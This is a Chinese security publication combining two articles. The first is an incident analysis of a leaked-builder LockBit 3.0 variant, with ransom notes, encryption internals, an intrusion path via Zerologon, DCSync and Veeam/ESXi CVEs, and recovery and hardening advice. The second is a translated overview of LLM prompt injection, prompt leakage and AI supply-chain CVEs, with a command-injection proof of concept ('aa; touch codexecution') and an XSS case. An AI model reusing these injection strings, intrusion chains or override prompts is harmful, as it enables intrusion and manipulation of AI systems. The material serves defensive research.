LockBit 3.0（也称为 LockBit Black）是LockBit 勒索软件的新变种。前身LockBit最早出现在2019年，安全研究人员一度将其称为ABCD（因为早期变种将加密文件的扩展名改为.abcd）。2021年，发布Lockbit2.0版本，也称Lockbit RED，加入了双重勒索攻击、删除磁盘卷影和日志文件等新功能。同时还内置了一款名为StealBit的数据窃取木马，该木马是为了支持LockBit Raas附属机构从受害者公司快速窃取敏感数据。被加密后的文件以.lockbit结尾，留下文档Restore-My-Files.txt。2022年，Lockbit3.0发布，又名LockBit Black，成为全球规模最大的勒索软件变种，且在2023年、2024年继续肆虐。

1.4 lockbit构建器泄露

在 2022 年 9 月，Twitter 用户 3xp0rtblog 宣布该勒索软件的构建器已被 ali_qushji 泄露，可以从 GitHub 上下载。

"招募合作伙伴"：是指LockBit勒索软件运营者主动寻找和吸纳其他人或组织作为合作伙伴或下属，共同参与勒索软件攻击活动。

针对lockbit构建器泄露的分析文章可参考Lockbit 3.0勒索病毒加密程序分析

LockBit 3.0 Builder 在 Twitter 上泄露

LockBit 3.0 构建器

1.5 家族特征

通过对本次捕获的加密器样本和勒索信内容的分析，我们发现其与正版 LockBit 3.0 家族存在明显差异：首先，勒索信的语言以中文版为主，缺少 LockBit 3.0 常见的多语言支持；其次，勒索信中未标注家族名称，暗网地址不具备 LockBit 家族的典型特征且目前无法访问；此外，信中额外提供了 TOX 和邮箱等多种联系方式，但对比 LockBit 3.0 官方暗网中的 TOX ID，发现其并不一致。综合这些差异，我们初步判断这是一个基于 LockBit 3.0 加密器泄露版本的构造样本，非正版家族攻击行为。

1.5.1 勒索信对比

原始勒索信内容

~~ LockBit 3.0 the world's fastest and most stable ransomware from 2019~~~
>>>>> Your data is stolen and encrypted.
BLOG Tor Browser Links:
http://lockbitxxxxxxiocyo5epmpy6klmejchjtzddoekjlnt6mu3qhxxxxxx.onion/
http://lockbitxxxxxx3katajf6zaehxz4h4cnhmz5t735zpltywhwpcxxxxxx.onion/
http://lockbitxxxxxxetlc4tl5zydnoluphh7fvdt5oa6arcp2757r7xxxxxx.onion/
http://lockbitxxxxxxki62yun7z5nhwz6jyjdp2c64j5vge536if2exxxxxx.onion/
http://lockbitxxxxxxuquhoka3t4spqym2m3dhe66d6lr337glmnlggxxxxxx.onion/
http://lockbitxxxxxxuo3qafoksvl742vieqbujxw7rd6ofzdtapjb4rxxxxxx.onion/
http://lockbitxxxxxxdgtojeoj5hvu6bljqtghitekwpdy3b6y62ixtxxxxxx.onion/
>>>>> What guarantee is there that we won't cheat you? 
We are the oldest ransomware affiliate program on the planet, nothing is more important than our reputation. We are not a politically motivated group and we want nothing more than money. If you pay, we will fulfill all the terms we agree on during the negotiation process. Treat this situation simply as a paid training session for your system administrators, because it was the misconfiguration of your corporate network that allowed us to attack you. Our pentesting services should be paid for the same way you pay your system administrators salaries. You can get more information about us on Ilon Musk's Twitter https://twitter.com/hashtag/lockbit?f=live
 
>>>>> You need to contact us on TOR darknet sites with your personal ID
Download and install Tor Browser https://www.torproject.org/
Write to the chat room and wait for an answer, we'll guarantee a response from us. If you need a unique ID for correspondence with us that no one will know about, ask it in the chat, we will generate a secret chat for you and give you his ID via private one-time memos service, no one can find out this ID but you. Sometimes you will have to wait some time for our reply, this is because we have a lot of work and we attack hundreds of companies around the world.
Tor Browser personal link for CHAT available only to you (available during a ddos attack): 
http://lockbit74beza5z3e3so7qmjnvlgoemscp7wtp33xo7xv7f7xtlqbkqd.onion
Tor Browser Links for CHAT (sometimes unavailable due to ddos attacks):
http://lockbit5eevg7vec4vwwtzxxxxxxap6oxbic2ye4mnmlq6njnpc47qd.onion
http://lockbit74beza5z3e3so7xxxxxxmscp7wtp33xo7xv7f7xtlqbkqd.onion
http://lockbit75naln4yj44rg6exxxxxx7up4kxmmmuvilcg4ak3zihxid.onion
http://lockbit7a2g6ve7etbcy6iyixxxxxxeffz4szgmxaawcbfauluavi5jqd.onion
http://lockbitaa46gwjck2xzmxxxxxx4x3aqn6ez7yntitero2k7ae6yoyd.onion
http://lockbitb42tkml3ipianjxxxxxxhcshb7oxm2stubfvdzn3y2yqgbad.onion
http://lockbitcuo23q7qrymbk6dxxxxxxtspjvjxgcyp4elbnbr6tcnwq7qd.onion
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>> Your personal Black ID:  <<
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>> Warning! Do not delete or modify encrypted files, it will lead to problems with decryption of files!
>>>>> Don't go to the police or the FBI for help and don't tell anyone that we attacked you.

泄露版勒索信内容

>>>> 我們是一個駭客組織，您的資料已被竊取並且加密，
為了不擴大損失，您要立即聯絡我們，或寻找资料复原公司联系我们。
不要啰嗦，我们很忙，我們的加密軟體，網路上無法解密!
您需要支付價值人民幣五十萬約等於1BTC 給我們幫您解密被加密檔案。
>>>> 您需要聯絡我們並使用您的個人解密 ID 傳送一個被加密文件給我們，免費幫您解密一個文件
>>>> 發送ID和一個加密檔案到：d6616151321813261@onionmail.org
>>>> 備用信箱：2189321765132@cock.li
>>>> 您的個人解密 ID：
Tox ID:XXXXXX5C6149FC57090DAC622184327326457BCDF5D6C45528083DBBE21A6EC927CFC1F8BD
TOR網站可以看到您洩漏的秘密：http://xxxxxbcqrbkutyrh77nptes44pqzldj5rk5mxnv46mmrapesp565bsyd.onion/
                          http://xxxxxjug4b5uhndzelsf7vgrxygttutc6h5mqzpwp7y6blk6owhxliqd.onion
您可以透過：幣安/火幣，歐易等虛擬貨幣交易所購買比特幣支付，這是一個很方便的過程！
寫信聊天並等待答复，我們將始終答复您。
有時您需要等待我們的答复，因為我們攻擊許多公司。
>>>> 警告！ 不要刪除或修改任何文件，這可能會導致恢復問題！
>>>> 警告！ 如果您不支付贖金，我們將再次多次攻擊您的公司！

1.5.2 暗网地址对比

原始暗网地址

http://lockbitxxxxxxcyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2id.onion/

泄露版暗网地址

本次捕获的勒索信中提到的暗网地址均无法访问，返回结果为404，推测这是攻击者采用的虚张声势手段，旨在通过伪造的联系方式增加受害者的恐慌感和可信度，从而更容易迫使其支付赎金。

http://xxxsabcqrbkutyrh77nptes44pqzldj5rk5mxnv46mmrapesp565bsyd.onion/
http://xxxr7jug4b5uhndzelsf7vgrxygttutc6h5mqzpwp7y6blk6owhxliqd.onion

2.逆向分析

以下内容为该加密器逆向分析的重点摘要，更多详细信息请参考完整文章内容【病毒分析】繁体勒索信暗藏玄机！要价50万RMB赎金的Lockbit泄露版分析

在关闭相关服务与进程后，创建多线程用于等待加密，创建的线程数 = 处理器内核总数 *2 + 1，并且创建IO端口用于协作加密

创建好加密线程后通过三种方式对文件进行检索和加密，每种模式加密都会生成不同的密钥

Exchange邮件服务上的文件
本地磁盘上的文件
所在域上的文件

对磁盘进行递归，判断路径是否是目录和要加密的文件

获取文件路径

更改文件安全描述符

首先获取文件指针，将文件属性设为隐藏属性，设置文件指针到末尾-132处，读取文件，校验

计算校验和

加密线程根据得到的加密结构体偏移0x28的值来决定当前执行的操作，该处的值有以下四种

0（读取）：根据偏移0x398处值向0x39C读入相应大小的文件内容，然后将偏移0x28的值修改为1，当文件内容读取完后会修改为2。

1（加密）：使用偏移0x318解密后的128字节密钥对文件内容进行加密，加密文件内容后对该128字节密钥再次加密，加密轮数减1，通过判断加密轮数为0时则会将模式修改为2，否则将模式修改为1继续读取文件内容，固定加密前0x20000字节

2（追加信息）：将解密文件所需的内容追加到文件末尾，然后将模式修改为3，准备结束加密过程。

3（结束）：结束当前文件的加密。

综上，加密流程大致如下

3.数据库恢复

以下内容为数据库恢复的技术细节说明，基于模拟测试环境进行操作，并非真实案例中的客户数据。本文旨在对本次数据库恢复的关键步骤和技术方法进行简要讲解，为类似场景提供技术参考与指导。

3.1 内容对比

使用十六进制查看工具进行观察，上方为正常mdf，下方为被加密mdf，可发现仅有头部被加密。

被加密的数据库文件头部在缩略查看时通常表现为十分混乱，通过计算文件的熵值也能验证这种加密所带来的混乱

sierting.mdf.X3rmENR07:

sierting.mdf:

通过分析被加密文件，可发现加密偏移量范围为000000h-4FFFF0h，即头部5MB

因此我们在没有任何备份的时候，可以以遗失较少数据为代价进行恢复

3.2 数据恢复

这里我们使用D-Recovery SQL Server作为恢复工具

由于加密损坏了表结构，因此首先需要准备一个表结构一致的mdf作为参照mdf

恢复后的的记录条数 25600059条

正常数据库的记录条数 26501904条

通过最简单的修复，发现修复率能够达到96.6%

3.3 原因分析

勒索团伙通常追求快速加密，以最大限度地缩短受害者的响应时间。因此，当文件大小超过设定的阈值时，他们往往采用部分加密策略，以提高加密效率并减少加密耗时。

4.溯源分析

在对受灾公司网络架构进行深入分析时，我们发现该公司虽然部署了众多安全设备和备份解决方案，并建立了相对成熟的安全运营体系，但在如此庞大的网络环境下，依然存在漏洞，导致黑客成功实施勒索加密攻击，最终造成业务瘫痪。通过详细分析，我们识别出黑客利用了一些隐蔽的攻击手法，如Killav、致盲等，这些技术成功绕过了现有的安全防护，未能及时被发现。我们将在后续文章中详细介绍这些攻击手法，并分享具体的防范建议。下文将逐步还原黑客的入侵路径，旨在通过这个溯源过程为大家提供反思和警示，帮助同行提升防范能力，避免类似事件的发生。

为了更好地保护客户的敏感信息，本次溯源将模拟搭建一个与客户实际环境相仿的网络架构，重现可能的黑客攻击路径与流程。在模拟过程中，我们将深入分析黑客如何渗透、传播、扩展权限并最终达成攻击目的，确保读者能够全面了解和应对各种可能的安全威胁。

4.1 黑客攻击路线图

NAS、ESXI、Veeam、数据库服务器均无法正常使用，且所有数据均已被加密

4.2 域：set.com

工程师首先对最主要的Veeam备份服务器进行排查，远程登录后发现服务器遭受Lockbit3勒索家族的攻击，黑客通过漏洞添加用户后在11月27日11:41:16执行加密器，最终所有备份文件均被加密。

由于Veeam的网络策略为仅ESXI服务器可访问，由此可知勒索团伙是完成攻击ESXI后横向至Veeam备份服务器。并且ESXI已加入到域中，攻击者在获取域控后通过漏洞CVE-2024-37085将域管理员administrator添加到创建的恶意用户组 ESX Admins中，实现对ESXI后台接管。

在域控服务器DC03中可以看到该条日志，攻击者在27号11月27日11:36:07执行了CVE-2023-27532漏洞EXP，经测试最终能够确认就是通过该漏洞实现入侵Veeam。

机器账户DC3$频繁出现登陆登出和wmi连接的情况，并且随后域管账户administrator就以LogonType3的形式登陆成功

推测以上行为是攻击者利用域控漏洞Zerologon实现dump管理员hash，攻击IP为10.0.10.12

在组策略的计划任务中发现了定时加密的计划任务，黑客将加密器和执行脚本放置在域控的共享目录中，该任务将会在对所有域主机执行run.bat。从而达到对大量目标快速加密，其中就包括因为通过SMB挂载到某主机上的NAS。

4.3 域：sub.set.com

IP 10.0.10.12为该子域的域控，被攻击者作为攻击父域的跳板机，在该主机的日志中发现10.0.10.42依然在和通信

排查10.0.10.42的服务器，发现了攻击者并未关闭攻击窗口，其利用rubeus配合printspooler漏洞，导致域控TGT泄漏，从而利用dcsync获取域管的hash。

42的服务器是一台web服务器，分析其日志发现login.aspx有较大的可能性存在漏洞。后经过代码审计，存在命令执行漏洞，但是该系统需要鉴权，账号密码获取方法还需要继续分析。

结合实际日志，也能看到IIS用户调用powershell进程

攻击上一级指向了10.0.10.40

4.4 域：set.local

10.0.10.40是该域中的数据库，在日志中发现10.0.100.15在11月18日11:35:30首次登陆了该服务器并且开启了clr，经确认sa密码为弱口令。

最终通过clr命令执行获取权限后通过土豆提权

10.0.10.41为sql数据库2，客户配置的环境中可以用Windows身份验证登录两台数据库，最终攻击者获取了web的账号密码。

4.5 汇总

本次安全事件的溯源分析揭示了攻击者通过多个环节逐步渗透并加密了客户环境中的关键系统。攻击者首先通过弱口令入侵了数据库服务器（10.0.10.40）。在日志中发现，攻击者在11月18日首次使用弱口令登录该服务器，并成功启用CLR，随后通过提权工具获得了更高权限。攻击者利用这一权限继续扩展攻击。

接下来，攻击者通过SQL数据库的Windows身份验证机制，在客户环境中的第二台数据库服务器（10.0.10.41）上获得了Web应用的账号密码用于攻击WEB01。

攻击者成功攻击下WEB01后，该主机成为攻击域控dc02的跳板，攻击者利用Rubeus工具结合PrintSpooler漏洞泄露了TGT票证，并通过DCSync攻击获取了域管理员的哈希值，进一步获取了子域控的完全控制权限。

随着子域控权限的获取，攻击者开始横向渗透至主域，通过Zerologon成功获取set.com的权限，后通过漏洞CVE-2024-37085获取ESXI权限。利用ESXI搭设代理并使用CVE-2023-27532攻击Veeam，成功入侵并加密了所有备份文件。

最终，攻击者通过在域控DC03组策略中设置定时任务，执行加密器脚本，通过SMB协议影响了挂载到某主机上的NAS，并成功加密了大量数据。

5. 安全加固建议和修复方法

1、杜绝弱口令，包括数据库、WEB、系统等各类服务，对口令强度需要有要求并定期修改。

2、禁止无约束委派，使用目标约束委派并审计委派配置。

3、遵循最小权限原则，定期审查和更新权限配置，确保仅授予必要权限。

4、定期更新系统和应用版本，及时安装安全补丁，避免使用过时的软件。

5、Veeam Backup漏洞官方修复补丁：https://www.veeam.com/products/downloads.html

以下是solar安全团队近期处理过的常见勒索病毒后缀：

出现时间	病毒名称	相关文章
2024/05	.moneyistime	【病毒分析】使用中文勒索信及沟通：MoneyIsTime 勒索家族的本地化语言转变及其样本分析
2024/09/29	.lol	【病毒分析】全网首发！全面剖析.LOL勒索病毒，无需缴纳赎金，破解方案敬请期待下篇！【工具分享】.LOL勒索病毒再也不怕！完整破解教程分享+免费恢复工具首发
2024/06/21	.MBRlock	【病毒分析】假冒游戏陷阱：揭秘MBRlock勒索病毒及其修复方法
2024/06/01	.steloj	【病毒分析】Steloj勒索病毒分析
2024/05/27	.TargetOwner	【病毒分析】技术全面升级，勒索赎金翻倍，新版本TargetOwner勒索家族强势来袭？
2024/05/17	.Lockbit 3.0	【病毒分析】Lockbit家族Lockbit 3.0加密器分析【成功案例】RDP暴露引发的蝴蝶效应：LockBit组织利用MSF工具及永恒之蓝漏洞进行勒索入侵
2024/05/13	.wormhole	【病毒分析】Wormhole勒索病毒分析
2024/04/09	.bianlian	【病毒分析】新兴TOP2勒索软件！存在中国受害者的BianLian勒索软件解密原理剖析
2024/03/20	.locked	【病毒分析】locked勒索病毒分析
2024/03/11	.Live1.5	【病毒分析】独家揭秘LIVE勒索病毒家族之1.5（全版本可解密）
2024/03/08	.Live2.0	【病毒分析】独家揭秘LIVE勒索病毒家族之2.0（全版本可解密）
2024/03/06	.Elbie	【病毒分析】phobos家族Elbie变种加密器分析报告
2024/03/01	.lvt	【病毒分析】交了赎金也无法恢复--针对国内某知名NAS的LVT勒索病毒最新分析
2024/02/26	.2700	【病毒分析】phobos家族2700变种加密器分析报告【成功案例】某集团公司的Phobos最新变种勒索病毒2700解密恢复项目
2024/01/18	._locked	中国人不骗中国人？_locked勒索病毒分析
2024/01/15	.faust	【病毒分析】phobos家族faust变种加密器分析
2024/01/15	.DevicData	【病毒分析】DevicData勒索病毒分析
2024/01/02	.jopanaxye	【成功案例】某集团公司的Phobos最新变种勒索病毒jopanaxye解密恢复项目
2023/12/01	.live1.0	【病毒分析】独家揭秘LIVE勒索病毒家族之1.0（全版本可解密）
2023/09/05	.CryptoBytes	【独家破解】揭秘境外黑客组织的20美元锁机病毒：深度逆向分析+破解攻略！赎金？给你付个🥚
2023/08/28	.mallox	【病毒分析】mallox家族malloxx变种加密器分析报告
2023/08/02	.rmallox	【病毒分析】mallox家族rmallox变种加密器分析报告【成功案例】间隔数月双团伙先后利用某ERP0day实施入侵和勒索的解密恢复项目
2023/01/10	.DevicData-Pa2a9e9c	【病毒分析】DevicData家族扩散：全球企业和机构成为勒索病毒头号攻击目标！
2023年初	.halo	【病毒分析】全网首发！以国内某安全厂商名字为后缀的勒索病毒分析
2021/05/01	.mallox	【病毒分析】Mallox家族再进化：首次瞄准Linux，勒索新版本全面揭秘！
2021年1月初	.babyk	【病毒分析】BabyK加密器分析-Windows篇【病毒分析】Babyk加密器分析-NAS篇【病毒分析】 Babyk加密器分析-EXSI篇【病毒分析】Babuk家族babyk勒索病毒分析【成功案例】利用多款国产内网渗透工具勒索数十台虚拟机的babyk解密恢复项目
2020/05/18	.consultraskey-F-XXXX	【成功案例】解决浙江xx电子有限公司的勒索病毒
2019/05/01	.src	【病毒分析】Phobos家族新变种 .SRC深度分析：揭示持续演变的勒索新威胁

勒索攻击作为成熟的攻击手段，很多勒索家族已经形成了一套完整的商业体系，并且分支了很多团伙组织，导致勒索病毒迭代了多个版本。而每个家族擅用的攻击手法皆有不同，TellYouThePass勒索软件家族常常利用系统漏洞进行攻击；Phobos勒索软件家族通过RDP暴力破解进行勒索；Mallox勒索软件家族利用数据库及暴力破解进行加密，攻击手法极多防不胜防。

而最好的预防方法就是针对自身业务进行定期的基线加固、补丁更新及数据备份，在其基础上加强公司安全人员意识。

6.安全建议

6.1 风险消减措施

前期处理方法（企业内部）:

1.尽快断开被感染设备的网络连接，以防止病毒进一步扩散!

2.请勿中途强制关机，该行为会造成不可逆后果

3.不要尝试自行解密或支付赎金，以免造成更大损失！以下为详细的消减措施:

1. 数据备份策略

定期进行数据备份，并确保备份数据存储在物理隔离的设备或云环境中，避免备份被勒索病毒感染。

实施多重备份策略，如每日、每周、每月备份，以确保在灾难恢复时有多种数据版本可供选择。

2. 系统和应用更新

定期更新操作系统和应用软件，及时打补丁，修复已知的漏洞。

开启自动更新功能，确保始终拥有最新的安全补丁。

3. 邮件和浏览器安全

部署电子邮件安全网关，过滤恶意附件和链接。

培训员工识别钓鱼邮件和恶意链接，提高对社会工程攻击的防范意识。

限制员工对高风险网站（如未经过筛选的下载网站）的访问，减少通过恶意广告和下载感染的风险。

4. 用户权限管理

最小权限原则（Principle of Least Privilege）：根据岗位需求分配权限，避免不必要的管理员权限。

禁止员工使用公共账户和共享账号，所有用户需拥有独立的登录凭证。

5. 启用多因素认证（MFA）

为关键系统和远程访问启用MFA，防止账号被未经授权访问。

除了密码之外，添加短信验证、动态令牌等额外的安全层。

6. 网络分段与隔离

实施网络分段，将关键系统与普通网络隔离开，防止勒索病毒在局域网内扩散。

对于重要的业务系统，采用单独的VLAN和防火墙策略进行防护。

7. 部署防勒索软件和端点检测响应（EDR）

使用防病毒软件和防勒索软件，及时识别和阻止潜在的勒索病毒攻击。

部署EDR解决方案，以监测和响应异常活动，迅速隔离感染设备，防止病毒扩散。

8. 建立并测试应急响应计划

制定详细的应急响应计划，明确在勒索攻击发生时的应对步骤。

定期演练，测试该计划的可操作性，并进行改进。

9. 入侵检测与流量监控

使用入侵检测系统（IDS）和入侵防御系统（IPS），识别和阻断异常流量。

监控网络流量日志，以便在勒索病毒传播的早期阶段及时发现异常。

6.2 安全设备调优

目标

通过对安全现状的梳理和分析，识别安全策略上的不足，结合目标防御、权限最小化、缩小攻击面等一系列参考原则，对设备的相关配置策略进行改进调优，一方面，降低无效或低效规则的出现频次；另一方面，对缺失或遗漏的规则进行补充，实现将安全设备防护能力最优化。

主要目标设备

网络安全防护设备、系统防护软件、日志审计与分析设备、安全监测与入侵识别设备。

6.3 全员安全意识增强调优

目标：

通过网络安全意识宣贯、培训提升全方位安全能力

形式：

线下培训与宣贯：采用面授形式，通过系统化的课程安排，确保全员深入理解网络安全的核心概念和防护措施。

线上替代方案

分发学习材料：在无法组织线下培训的情况下，可以提供安全意识培训材料，由各级管理层分发，鼓励员工自主学习。

线上培训会议：组织线上集体学习会，安排网络安全专家进行远程培训，确保人员得到充分指导和答疑。

我司自主研发的知行网络安全教育平台结合多种培训方式的组合，灵活应对不同场景，确保每位员工具备扎实的网络安全意识与技能。

知行网络安全教育平台

视频学习功能

题目练习功能

自主练习功能

7.团队介绍

solar团队数年深耕数据恢复领域，在数据恢复领域建立了良好的声誉，以高效、安全、可靠的解决方案赢得了客户的信任。无论是个人用户还是大型企业，都能提供量身定制的服务，确保每一个被勒索软件侵害的数据都能够恢复到最佳状态，同时在数据恢复后，提供全面的后门排查及安全加固服务，杜绝二次感染的风险。

同时，solar团队坚持自主研发及创新，在攻防演练平台、网络安全竞赛平台、网络安全学习平台方面加大研发投入，目前已获得十几项专利及知识产权。

团队也先后通过了科技型中小企业、创新型中小企业认证、ISO9001质量管理体系、ISO14000环境管理体系、ISO45001职业安全健康管理体系、ITSS（信息技术服务运行维护标准四级）以及国家信息安全漏洞库(CNNVD)技术支撑单位等认证，已构建了网络安全行业合格的资质体系。

8.数据恢复服务流程

多年的数据恢复处理经验，在不断对客户服务优化的过程中搭建了"免费售前+安心保障+专业恢复+安全防御"一体化的专业服务流程。

① 免费咨询/数据诊断分析

专业的售前技术顾问服务，免费在线咨询，可第一时间获取数据中毒后的正确处理措施，防范勒索病毒在内网进一步扩散或二次执行，避免错误操作导致数据无法恢复。

售前技术顾问沟通了解客户的机器中毒相关信息，结合团队数据恢复案例库的相同案例进行分析评估，初步诊断分析中毒数据的加密/损坏情况。

② 评估报价/数据恢复方案

您获取售前顾问的初步诊断评估信息后，若同意进行进一步深入的数据恢复诊断，我们将立即安排专业病毒分析工程师及数据恢复工程师进行病毒逆向分析及数据恢复检测分析。

专业数据恢复工程师根据数据检测分析结果，定制数据恢复方案（恢复价格/恢复率/恢复工期），并为您解答数据恢复方案的相关疑问。

③ 确认下单/签订合同

您清楚了解数据恢复方案后，您可自主选择以下下单方式：

双方签署对公合同：根据中毒数据分析情况，量身定制输出数据恢复合同，合同内明确客户的数据恢复内容、数据恢复率、恢复工期及双方权责条款，双方合同签订，正式进入数据恢复专业施工阶段，数据恢复后进行验证确认，数据验证无误，交易完成。

④ 开始数据恢复专业施工

安排专业数据恢复工程师团队全程服务，告知客户数据恢复过程注意事项及相关方案措施，并可根据客户需求及数据情况，可选择上门恢复/远程恢复。

数据恢复过程中，团队随时向您报告数据恢复每一个节点工作进展（数据扫描 → 数据检测 → 数据确认 → 恢复工具定制 → 执行数据恢复 → 数据完整性确认）。

⑤ 数据验收/安全防御方案

完成数据恢复后，我司将安排数据分析工程师进行二次检查确认数据恢复完整性，充分保障客户的数据恢复权益，二次检测确认后，通知客户进行数据验证。

客户对数据进行数据验证完成后，我司将指导后续相关注意事项及安全防范措施，并可提供专业的企业安全防范建设方案及安全顾问服务，抵御勒索病毒再次入侵。

点击关注下方名片进入公众号了解更多

阅读原文

跳转微信打开

大语言语言模型安全攻击以及AI供应链漏洞

Fri, 15 Nov 2024 11:28:00 +0800

梅苑 2024-11-15 11:28 广东

本篇文章为翻译文章，让我们跟随梅苑师傅的脚步，一起来研究一下大语言语言模型安全攻击以及AI供应链漏洞！

简要说明

人工智能和人工智能的安全性正在以惊人的速度发展，AI模型供应链中使用的工具，用于构建机器学习模型，会使AI应用程序容易受到独特的安全威胁。

这些工具是开源的，这意味着它们开箱即用时可能存在漏洞，这些漏洞可直接导致完整的系统接管，例如未经身份验证的远程代码执行或本地文件包含。这意味着什么？您可能面临模型、数据和凭据被盗的风险。

大语言模型因其出色的文本理解和生成能力，被广泛应用于自然语言处理领域并取得了显著成果，为社会各界带来了巨大的便利。然而，大语言模型自身仍存在明显的安全问题，严重影响其应用的可信性与可靠性，是安全学者需广泛关注的问题。

此专题主要目的为拓宽AI与AI供应链安全相关知识，以下内容均为参考论文、博客，拓宽知识面，提升对安全认知的宽度。

技术背景

美国人工智能研究实验室 OpenAI 开发出一种可能会改变人类历史的人工智能技术驱动的自然语言处理工具，一种划时代的产物 ChatGPT，ChatGPT 是AI 技术进展的成果，已经获得了代码的理解能力，潜在地获得了复杂推理的能力，可以和人类的常识、认知、需求、价值观保持一致，ChatGPT 在大量的网络文本数据上进行训练。

它的知识和语言表达能力比其他 AI 机器人更加丰富，并且拥有更强的自然语言处理能力，能够理解复杂的语言结构，回答各种类型的问题，知识范围更广更智能，回答更加精确，可以根据用户的语境和问题进行上下文理解，还可以撰写邮件、视频脚本、文案、翻译、代码等任务。

大语言模型（LLM）的提示注入攻击

使用“IgnorePrevious Prompt”命令来指导 LLM 无视之前的指令，这可能被用来绕过内容审查、生成恶意内容。

提示注入攻击主要利用 LLM 在处理文本时常常难以区分系统指令和用户输入的缺陷,这种界限的模糊可能导致恶意指令的成功注入。

LLM 在生成文本时依赖于对自然语言的识别和处理,然而在自然语言中系统指令和用户输入提示词往往混合在一起,缺乏清晰的界限。由于这种模糊性，LLM有可能将系统指令和用户输入统一当作指令来处理,缺乏对提示词进行严格验证的机制，从而因受到恶意指令的干扰而输出具有危害性的内容。

大语言模型（LLM）的幻觉问题

大语言模型的幻觉问题指模型在处理输入任务、维持输出语境连贯性以及与现实世界事实保持一致性时存在偏差或错误。

如图所示,大模型的幻觉问题可归结为３种主要表现形式:

１)回答与输入任务不匹配,即模型生成的回答与用户输入的任务不相关;

２)回答内容语境不一致,即模型生成的回答前后矛盾;

３)回答与既定事实相违背,即模型生成的回答与现实世界的可验证事实存在冲突。

这些幻觉问题影响了大模型的可靠性，并限制了大模型的应用范围，尤其是在关键领域如医疗和金融。

大语言模型（LLM）的提示词泄露

提示词泄露将导致本属于应用开发者的系统提示词被其他竞争对手用于获利，而为用户定制的提示词被泄露可能导致用户隐私信息被泄露。提示词泄露亦有可能增强其他针对大模型的攻击，例如攻击者可基于被泄露的系统提示词，针对性优化提示词注入攻击的载荷，从而更好地绕过系统提示词为大模型添加的安全措施。

上图给出了泄露大模型应用的系统提示词，攻击者可向应用发送专门构造的攻击载荷，这些攻击载荷使得大模型忽略提示词的要求，转而执行复述操作，将该应用的提示词返回给攻击者。

不安全特性可被利用于AI供应链攻击

腾讯朱雀实验室在对datasets等AI开源组件进行安全研究时发现，开发者通常会使用datasets组件的load_dataset函数加载数据集，为了考虑支持更复杂的数据处理格式或流程，当加载的数据集下包含有与数据集同名的Python脚本时，将会默认运行该脚本。

由于Hugging Face平台上的数据集都由用户上传，如果数据集中的Python脚本包含恶意行为，那么会造成严重的安全风险，如下图所示，攻击者构造的恶意脚本会主动连接攻击者服务器，并等待攻击者下发执行系统命令，最终窃取受害者服务器上的敏感数据。

利用该特性，攻击者可通过在Hugging Face、Github及其他渠道分发包含恶意后门代码的数据集，当开发者通过datasets组件加载恶意数据集进行训练或微调时，数据集里的恶意后门代码将会运行，从而导致AI模型、数据集、代码被盗或被恶意篡改。

作为AI领域的基础库，datasets拥有很大的下载量，根据pypistats网站统计，最近一天下载量将近10万。一旦有恶意数据集在网络上被大范围传播与使用，将会有大量开发者遭受这种供应链后门投毒攻击。

AI供应链漏洞（CVE-2024-0521）

PaddlePaddle作为中国首个自主研发的深度学习平台，自2016年起正式开源给专业社区。它是一个拥有先进技术和丰富功能的工业平台，涵盖核心深度学习框架、基本模型库、端到端开发套件、工具和组件以及服务平台。PaddlePaddle起源于工业实践，致力于工业化。它已被制造业、农业、企业服务业等广泛采用，同时为超过 1070 万开发人员、235,000 家公司和 860,000 个模型提供服务。凭借这些优势，PaddlePaddle已经帮助越来越多的合作伙伴将AI商业化。

受影响的代码：

def _wget_download(url, fullname):    # using wget to download url    tmp_fullname = fullname + "_tmp"    # –user-agent    command = f'wget -O {tmp_fullname} -t {DOWNLOAD_RETRY_LIMIT} {url}'    subprc = subprocess.Popen(        command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE    )

该漏洞源于 url 参数在未经适当验证或清理的情况下合并到命令字符串中的方式。如果 url 是从不受信任的来源构建的，则攻击者可能会注入恶意命令。

POC验证：

from paddle import utilsutils.download._wget_download("aa; touch codexecution", "bb")

然后将执行以下命令：

wget -O bb_tmp -t 3 aa; touch codexecutioncodeexecution

利用此漏洞的攻击者可以使用运行代码的进程的权限在主机系统上执行任意命令。根据使用此代码的上下文，这可能会导致未经授权的访问、数据丢失或其他潜在的有害后果。

修复patch：

AI供应链漏洞（CVE-2023-6778）

ClearML 是一个开源平台（之前叫TRAINS），可为全球数千个数据科学团队自动化并简化机器学习解决方案的开发和管理。

“项目描述”和“报告”部分中使用的 Markdown 编辑器组件未应用适当的数据清理。当未经筛选的数据传递到此组件时，它允许注入恶意 XSS 有效负载。

具体而言，此漏洞存在于“项目描述”和“报告”部分中，使其容易受到存储的 XSS 攻击。在项目描述的情况下，在创建项目并输入其名称和描述后，在概述中，项目描述直接传递到文件中的这一行：

/app/webapp-common/project-info/project-info.component.ts

this.info = project.description;

然后在这里渲染：

  <sm-markdown-editor    #editor    *ngIf="!loading"    [class.editor]="editor.editMode"    [data]="info"    [readOnly]="example"    (saveInfo)="saveInfo($event)"  >    <div no-data class="flex-middle overview-placeholder" *ngIf="!example">      <i class="icon i-markdown xxl">i>      <div class="no-data-title">THERE’S NOTHING HERE YET…div>      <button (click)="editor.editClicked()" class="no-data-button btn btn-neon">        <span>ADD PROJECT OVERVIEWspan>      button>    div>  sm-markdown-editor>div>

以下视频演示了如何成功利用此漏洞，重点介绍如何生成应用凭据：

此漏洞具有重大的安全隐患，因为它可能导致用户帐户泄露和操纵应用程序中的各种关键功能。此漏洞的潜在影响包括：

1.用户配置文件操作：攻击者可以利用存储的 XSS 修改应用程序内用户的配置文件名称。这可能会导致冒充、身份盗用和用户混淆。

2.项目删除：通过使用 XSS 有效负载，攻击者可以强制受害者删除其项目，从而可能导致数据丢失和应用程序功能中断。

‍3.应用凭据滥用（在 POC 视频中演示）：此漏洞的最严重后果是能够使用受害者的帐户生成应用凭据。应用程序凭据通常在应用程序中具有重要权限，允许用户执行各种管理操作。

使用泄露的应用凭据，攻击者可以：

创建管道，这可能会导致未经授权的数据处理。
连接 ClearML 代理，可能会损害机器学习操作的完整性。
删除模型，导致潜在的数据丢失和系统中断。
以与受害者相同级别的权限执行其他操作，从而破坏应用程序的整体安全性和稳定性。

转载翻译汇总文献图片来源：

[1]huntr - 世界上第一个用于 AI/ML 的漏洞赏金平台：https://huntr.com/

